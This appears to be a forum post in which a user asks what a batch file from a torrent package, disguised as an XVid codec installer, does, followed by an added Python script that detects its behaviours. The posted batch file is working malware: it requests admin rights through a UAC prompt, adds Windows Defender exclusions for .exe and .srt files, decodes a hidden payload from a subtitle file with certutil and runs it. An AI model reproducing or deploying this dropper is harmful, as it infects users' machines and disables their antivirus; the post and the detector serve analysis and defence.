Can someone explain what this batch file does?

  batch-file, powershell, windows

I recently downloaded a media package from a torrent which doesn't run on VLC, and on Windows Media Player it says "The Player might not support the file type or might not support the codec that was used to compress the file". The package also includes a batch file with the name Ultra XVid Codec setup. When I tried running it, it asked for some admin permission, so I denied it and closed it. Later I opened it using VS Code and the code was this. Just out of curiosity, can someone briefly explain what this code tries to do and what threat it poses?

 @echo off
 CLS
 ECHO.
 ECHO ======================================
 ECHO ===Running Admin shell please wait====

:init
 setlocal DisableDelayedExpansion
 set cmdInvoke=1
 set winSysFolder=System32
 set "batchPath=%~0"
 for %%k in (%0) do set batchName=%%~nk
 set "vbsGetPrivileges=%temp%OEgetPriv_%batchName%.vbs"
 setlocal EnableDelayedExpansion

:checkPrivileges
  NET FILE 1>NUL 2>NUL
  if '%errorlevel%' == '0' ( goto gotPrivileges ) else ( goto getPrivileges )

:getPrivileges
  if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges)
  ECHO.
  ECHO **************************************
  ECHO Invoking UAC for Privilege Escalation
  ECHO **************************************

  ECHO Set UAC = CreateObject^("Shell.Application"^) > "%vbsGetPrivileges%"
  ECHO args = "ELEV " >> "%vbsGetPrivileges%"
  ECHO For Each strArg in WScript.Arguments >> "%vbsGetPrivileges%"
  ECHO args = args ^& strArg ^& " "  >> "%vbsGetPrivileges%"
  ECHO Next >> "%vbsGetPrivileges%"

  if '%cmdInvoke%'=='1' goto InvokeCmd 

  ECHO UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%vbsGetPrivileges%"
  goto ExecElevation

:InvokeCmd
  ECHO args = "/c """ + "!batchPath!" + """ " + args >> "%vbsGetPrivileges%"
  ECHO UAC.ShellExecute "%SystemRoot%%winSysFolder%cmd.exe", args, "", "runas", 1 >> "%vbsGetPrivileges%"

:ExecElevation
 "%SystemRoot%%winSysFolder%WScript.exe" "%vbsGetPrivileges%" %*
 exit /B

:gotPrivileges
 setlocal & cd /d %~dp0
 if '%1'=='ELEV' (del "%vbsGetPrivileges%" 1>nul 2>nul  &  shift /1)

 powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExt "exe"
 powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExt "srt"
 ECHO.
 ECHO Download update..
 ping 127.0.0.1 -n 8 > nul

 certutil -decodehex -f 75095_VTS.srt 75095_VTS_tmp.srt

 start 75095_VTS_tmp.srt

 ECHO %batchName% Arguments: P1=%1 P2=%2 P3=%3 P4=%4 P5=%5 P6=%6 P7=%7 P8=%8 P9=%9
 cmd /k
 exit

Source: Windows Questions
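
A defender-side illustration for the script in the post above (an added example, not part of the original post): a small static triage pass that flags the behaviours visible in it, namely a UAC prompt through `ShellExecute` with the `runas` verb, Microsoft Defender extension exclusions, and a `certutil` decode whose output is then opened with `start`. The `triage` function and its rule names are assumptions of this example, and the sample input is constructed from lines of the posted script.

```python
import re

# Constructed sample: the security-relevant lines copied from the batch file in the post.
SAMPLE = r'''
ECHO UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%vbsGetPrivileges%"
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExt "exe"
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExt "srt"
certutil -decodehex -f 75095_VTS.srt 75095_VTS_tmp.srt
start 75095_VTS_tmp.srt
'''

# PowerShell accepts unambiguous parameter prefixes, so -ExclusionExt is -ExclusionExtension.
EXCLUSION = re.compile(r'Add-MpPreference\b.*?-(Exclusion\w+)\s+"?([^"\s]+)', re.I)
RUNAS = re.compile(r'ShellExecute\b.*"runas"', re.I)

def triage(script):
    """Return (line_no, rule, detail) findings; rule names are hypothetical labels."""
    findings, decoded = [], {}   # decoded: lowercased output file name -> line number
    for no, raw in enumerate(script.splitlines(), 1):
        line = raw.strip()
        tokens = line.split()
        if not tokens or line.lower().startswith(("rem ", "::")):
            continue             # skip blank lines and batch comments
        cmd = tokens[0].lower().lstrip("@")
        m = EXCLUSION.search(line)
        if m:                    # antivirus exclusion added from a script
            findings.append((no, "defender-exclusion", f"{m.group(1)}={m.group(2)}"))
        if RUNAS.search(line):   # elevation request that triggers the UAC prompt
            findings.append((no, "uac-elevation", "ShellExecute with runas verb"))
        if cmd in ("certutil", "certutil.exe"):
            flags = {t.lower() for t in tokens[1:] if t.startswith("-")}
            files = [t.strip('"') for t in tokens[1:] if not t.startswith("-")]
            if flags & {"-decode", "-decodehex"} and len(files) >= 2:
                decoded[files[1].lower()] = no   # remember the decoded output file
                findings.append((no, "certutil-decode", f"{files[0]} -> {files[1]}"))
        if cmd == "start" and len(tokens) > 1:
            target = tokens[-1].strip('"')
            if target.lower() in decoded:        # decoded file is opened afterwards
                findings.append((no, "open-decoded-file",
                                 f"{target} (decoded on line {decoded[target.lower()]})"))
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(*finding, sep="\t")
```
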
